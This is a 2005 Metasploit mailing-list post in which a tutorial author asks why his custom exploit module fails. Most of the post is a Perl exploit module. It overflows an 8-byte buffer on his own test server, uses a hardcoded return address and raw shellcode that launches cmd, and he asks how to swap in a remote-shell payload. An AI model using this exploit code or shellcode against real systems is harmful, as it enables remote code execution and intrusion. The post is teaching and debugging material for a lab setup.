A small Windows problem

[vmukhi at vsnl.com (Vijay Mukhi)]

I am writing a tutorial on MetaSploit at www.vijaymukhi.com. I have a tiny server listening on port 2000 at IP address 
70.0.0.2. When I run the following exploit it overruns a 8 byte buffer on my server and opens a DOS box on the server. 
Being a teacher I try and make my code as easy to understand as possible and hence have hard coded the addresses,  
0012ff8c is the address on the stack where my shell code starts. 

package Msf::Exploit::z;
use base "Msf::Exploit";
$info =
{
'Payload' => 
{
'Space' => 1000
},
'DefaultTarget' => 0,
'Targets' => [
['Windows 2000 SP0-SP4']]
};
sub new
{
$class = shift;
$self = $class->SUPER::new({'Info' => $info});
}
sub Exploit
{
$self = shift;
$shellcode = $self->GetVar('EncodedPayload')->Payload;
$s = Msf::Socket::Tcp->new('PeerAddr'  => '70.0.0.2', 'PeerPort'  => 2000);
$req = "AAAAAAAAAAAA" . "\x8c\xff\x12\x00" . "\x00\x00\x00\x00" ;
$req .= "\x55\x8b\xec\x51\xc7\x45\xfc\x63\x6d\x64\x00\x6a\x05\x8b\xc5\x83\xe8\x04";
$req .= "\x50\xb8\x1d\x9c\x4e\x7c\xff\xd0\x6a\x00\xb8\x1a\xe0\x4e\x7c\xff\xd0";
$s->Send($req);
}

If I comment out the last two lines and replace them with

$req .= $shellcode;

I set the payload to win32_bin. When I now run the exploit I expect the system to open a dos box on the machine that I 
am running my exploit on and connect it to the target machine. nothing happens. what am I doing wrong. any Help or 
pointers would be higly appreciated. 

Vijay Mukhi
Bombay India
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20050610/c7e4fe3c/attachment.htm>